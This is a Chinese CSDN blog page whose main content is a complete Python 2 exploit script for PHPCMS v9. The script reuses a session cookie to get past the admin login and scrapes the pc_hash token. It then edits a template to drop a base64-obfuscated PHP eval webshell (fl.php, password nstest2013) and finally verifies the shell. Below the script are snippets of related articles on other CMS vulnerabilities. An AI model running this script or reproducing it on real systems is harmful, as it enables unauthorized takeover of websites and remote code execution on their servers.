%3cphp和%3c php_phpcmsv9后台登录绕过

最新推荐文章于 2024-01-14 16:58:10 发布
最新推荐文章于 2024-01-14 16:58:10 发布
阅读量2.5k 收藏
点赞数
文章标签: %3cphp和%3c php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42375011/article/details/112877656
版权
该博客介绍了如何利用PHP代码进行PHP CMS v9后台登录绕过攻击。通过设置特定的Cookie,然后构造HTTP请求,获取并使用pc_hash,最终实现文件编辑并植入Webshell。
摘要由CSDN通过智能技术生成

#! /usr/bin/env python

import urllib2,re

#code by 花开、若相惜

#PaxMac Team

url=raw_input('input your attack url: ')

CmsCookie="PHPSESSID=18iigb6m80nrl1v7u5h53v7km3"#change here

response = urllib2.Request(url+'/index.php?m=admin')

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

#print attck.read()

pattern = re.compile('pc_hash=\w{6}', re.I)

match = pattern.search(attck.read())

if match:

hashkey=match.group()

print "I Got pc_hash :"+hashkey

attck.close()

print "Start getshell..."

data="code=%3C%3Fphp+fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW25zdGVzdDIwMTNdKTsgPz4x))%3B%3F%3E%0D%0A%7Btemplate+\

%27member%27%2C+%27header%27%7D%0D%0A%3Cdiv+id%3D%22memberArea%22%3E%0D%0A%7Btemplate+%27member%27%2C+%27left%27%7D%0D%0A%3Cdiv+class%3D%22\

col-auto%22%3E%0D%0A%3Cdiv+class%3D%22col-1+%22%3E%0D%0A%3Ch6+class%3D%22title%22%3E%E6%B6%88%E8%B4%B9%E8%AE%B0%E5%BD%95%3C%2Fh6%3E%0D%0A%3Cdiv+\

class%3D%22content%22%3E%0D%0A%3Cform+name%3D%22searchform%22+action%3D%22%7BAPP_PATH%7Dindex.php%3Fm%3Dpay%26c%3Dspend_list%26a%3Dinit%22+\

method%3D%22get%22+%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22pay%22+name%3D%22m%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+\

value%3D%22spend_list%22+name%3D%22c%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22init%22+name%3D%22a%22%3E%0D%0A%09%09%3Cdiv+\

class%3D%22search%22%3E%0D%0A%09%09%E8%AE%A2%E5%8D%95%E6%97%B6%E9%97%B4++%7Bform%3A%3Adate%28%27starttime%27%2Cformat%3A%3Adate%28%24starttime%29%29%7D\

+%E5%88%B0+++%7Bform%3A%3Adate%28%27endtime%27%2Cformat%3A%3Adate%28%24endtime%29%29%7D%0D%0A%09%09%7Bform%3A%3A\

select%28array%28%27%27%3D%3E%27%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%27%2C+%271%27%3D%3E%27%E9%87%91%E9%92%B1%27%2C+%272%27%3D%3E%27%E7%A7%AF%E5%88%86%27%29%2C%24\

type%2C%27name%3D%22type%22%27%29%7D++%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22%E6%9F%A5%E8%AF%A2%22+class%3D%22button%22+name%3D%22\

dosubmit%22%3E%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%3C%2Fform%3E%0D%0A%3Ctable+width%3D%22100%25%22+cellspacing%3D%220%22++\

class%3D%22table-list%22%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++\

%3Ctr%3E%0D%0A++++++++++++%3Cth+width%3D%2220%25%22%3E%E6%B6%88%E8%B4%B9%E5%86%85%E5%AE%B9%3C%2Fth%3E%0D%0A++++++++++++\

%3Cth+width%3D%2220%25%22%3E%E6%97%B6%E9%97%B4%3C%2Fth%3E%0D%0A++++++++++++%3Cth+width%3D%2215%25%22%3E%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%3C%2Fth%3E%0D%0A\

++++++++++++%3Cth+width%3D%228%25%22%3E%E6%95%B0%E9%87%8F%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++\

%3Ctbody%3E%0D%0A%09%7Bloop+%24list+%24info%7D+%0D%0A%09%3Ctr%3E%0D%0A%09%3Ctd+width%3D%2220%25%22+align%3D%22center%22%3E%7B%24info%5B%27msg%27%5D%7D%3C\

%2Ftd%3E%0D%0A%09%3Ctd++width%3D%2220%25%22+align%3D%22center%22%3E%7Bformat%3A%3Adate%28%24info%5B%27creat_at%27%5D%2C+1%29%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+\

width%3D%2215%25%22+align%3D%22center%22%3E%7Bif+%24info%5Btype%5D%3D%3D1%7D%E9%87%91%E9%92%B1%7Belseif+%24info%5Btype%5D%3D%3D2%7D%E7%A7%AF%E5%88%86%7B%2F\

if%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+width%3D%228%25%22+align%3D%22center%22%3E%7B%24info%5B%27value%27%5D%7D%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%7B%2Floop%7D%0D%0A\

++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A+%3Cdiv+id%3D%22pages%22%3E+%7B%24pages%7D%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cspan+\

class%3D%22o1%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o2%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o3%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o4%22%3E%3C%2Fspan%3E%0D%0A%3C%2F\

div%3E%0D%0A%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27member%27%2C+%27footer%27%7D%0D%0A&dosubmit=%E6%8F%90%E4%BA%A4&"+hashkey

response = urllib2.Request(url+'/index.php?m=template&c=file&a=edit_file&style=default&dir=pay&file=spend_list.html',data)

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

#print attck.read()

attck.close()

response = urllib2.Request(url+'/index.php?m=template&c=file&a=visualization&style=default&dir=pay&file=spend_list.html&'+hashkey)

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

attck.close()

try:

response = urllib2.Request(url+'/fl.php')

response.add_header('Cookie',CmsCookie)

response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')

attck = urllib2.urlopen(response)

if str(attck.read())=="1":

print "Webshell :"+url+'/fl.php'+" "+"password:nstest2013"

else:

print "Failed!"

attck.close()

except urllib2.HTTPError, e:

print e.code

一个轮子
关注
php绕过管理员登录,EspCMS后台登录绕过漏洞再利用
weixin_34570241的博客
03-17 787
之前4月13日在360的漏洞平台提交过一次,当时给出了能计算出db_pscode的利用工具。db_pscode是安装的时候随机生成的一个字符串常量,保存在配置文件里。4月22日,官方发布了新版本,改进了程序安装时候生成db_pscode的方法,"修复了"该漏洞。其实官方只是防住了当时的那个exp,并没有从根本上防住漏洞。22日之前是32位的md5hash字符串,这次长度变的不固定可以是1-39位的...
phpcms隐藏index.php,phpcms去掉前台和后台登录验证码
weixin_29670781的博客
04-03 222
前台关闭方法:\phpcms\modules\member\index.php // 查找“//判断验证码”下面4行代码$code=isset($_POST['code'])&&trim($_POST['code'])?trim($_POST['code']):showmessage(L('input_code'),HTTP_REFERER);if($_SESS...
phpcms v9文件上传的四次绕过复现
lml_0916的博客
08-15 1396
跟上一个不同的就是,我将解压后的文件夹放进一个递归里面,如果你文件夹中还有并且里面包含php文件,我也进行一个删除,但是,在它的写法中存在了一个逻辑错误,它是先进行查找,查找到之后就进行删除,那么就可以在它查到但是没有删除的这一个时间里面,我在写入一个php文件,即便它删除了我上传的,但是我新写入的那个是没有删除的,这也就是要采取一个时间竞争的关系来写入文件。它发现又有人绕过了,它就又写出了一种方式,就是即便我解压失败了,我也要在进行一次递归查询,如果你这还有的话,我还是会给你删了。......
apache %3c php,关于php包含Apache日志的随想
weixin_35238815的博客
03-24 1148
关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句 i...
html中执行写%3cphp%3e,thinkphp5.x命令执行漏洞复现及环境搭建
weixin_36284522的博客
06-01 661
楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了一.thinkphp5.X系列1.安装composeryum -y install composer 安装php拓展yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bc...
Cphp-开源
05-01
这些文件的结构和功能反映了"Cphp-开源"对Web应用常见需求的全面覆盖。 `classes`目录下,很可能是项目中定义的各种自定义类,这些类扩展了PHP的基本功能,可能包括数据验证、数据库操作、用户认证等。类的封装和...
W3SCHOOL PHP离线教程
08-28
W3SCHOOL PHP离线教程,可以快速的对PHP的语法有个简单的认识,也可作为参考工具开发时使用
前台隐藏不必要的栏目插件 for PHP168.rar
07-14
PHP168前台隐藏不必要的栏目插件 插件简介:此功能是把...建议member\post.php,admin\sort.php 两个文件中的 ])>100||$fid )不要更改,或者不要设置超200,官方设置的100有其道理,否则后台和前台打开速度会很慢。  
noteBook::red_apple:笔记本
01-30
我的苹果笔记本 零,序言 平时积累的东西以笔记的形式分享出来 用法 目录结构 - js - public js示例 - main.js es6入口 - src webpack示例 - server.js webpack入口 - webpack.... - package.json 依赖管理 ...
phpcms更换服务器后前台后台无法登录的解决方法
09-29
有朋友说phpcms网站搬家、更换IP后,前台和后台都无法登录,应朋友要求,处理pc换ip后无法登录,经过一个小时的忙活,终于看到成效啦,下面我就分享下自己是怎么解决的,希望可以帮到遇到困惑的朋友们。
“PbootCMS漏洞揭秘:绕过登录检查获取管理员权限“
最新发布
奇妙的Bug之旅
01-14 3622
PbootCMS是一款基于PHP开发的内容管理系统,提供了丰富的功能和模块,但也存在一些安全漏洞。本文将介绍并详细分析PbootCMS中的一个漏洞,同时提供一个完整的实例来展示漏洞的利用过程。本文详细介绍了PbootCMS中的一个漏洞,并提供了一个完整的实例来展示漏洞的利用过程。通过了解漏洞的原理和修复方法,我们可以更好地加强系统的安全性,保护网站和用户的信息安全。
%3cphp和%3c php_php后门漏洞 渗透测试重点介绍
weixin_39652760的博客
12-22 394
原标题:php后门漏洞 渗透测试重点介绍很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的Sine安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障,安全保障了,网站才能更长远的运行下去。 4.1.1. 后门4.1.1.1. php.ini构成的后门利用 auto_prepend_f...
%3cphp和%3c php_入侵检测PHP程序中的目录遍历漏洞
weixin_39626586的博客
12-30 294
目录遍历漏洞在国内外有许多不同的叫法,比如也可以叫做信息泄露漏洞,非授权文件包含漏洞.名称虽然多,可他们却有一个共同的成因,就是在程序中没有过滤用户输入的../和./之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件,其危害可想而知.这类漏洞大家比较熟悉的可能就是在一些邮件列表程序以及网络硬盘程序中,其实这类漏洞还广泛存在与一些国外的BLOG程序中,这类漏洞大概分两种下面就...
php %3c%3c%3cxml 报错,代码审计| APPCMS SQL-XSS-CSRF-SHELL
weixin_39657249的博客
03-19 172
0x01 背景由若水师傅提供的一个素材,想要复现CNVD上披露的一个APPCMS的漏洞,由CNVD上的描述可以知道存在漏洞的地方是comment.php这个文件,然后就没有详细的漏洞信息了,所以就需要分析相应的源码文件找出存在漏洞的点。借这个素材捡起下代码审计的各种感觉。期待一起学习,期待和师傅们各种交流讨论。官方站点:http://www.appcms.cc/漏洞详情地址:http://www....
php中%3ci%3e%3c/i%3e标签,php中urlencode与rawurlencode的区别
weixin_42517963的博客
03-10 2527
前段时间说自己遇到了个《URL加号引发错误》的BUG,引起这个bug的原因就是自己在URL中使用了 urlencode 函数,该函数会把空格转换成加号,这样就导致URL解析出错,而空格只有转换成 %20 才可以可以正常解析,这时我们就需要使用 rawurlencode 函数。下面就介绍一下 urlencode 函数与 rawurlencode 函数的区别:urlencode 函数:返回字符串,此字...
%3C%3F这类的串,如何给解释成正常的字符? 这串应该是 <? 这两个符号
memory235的专栏
11-05 7007
String str = URLDecoder.decode("%3C%3F", "GBK"); System.out.println(str); 打印:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值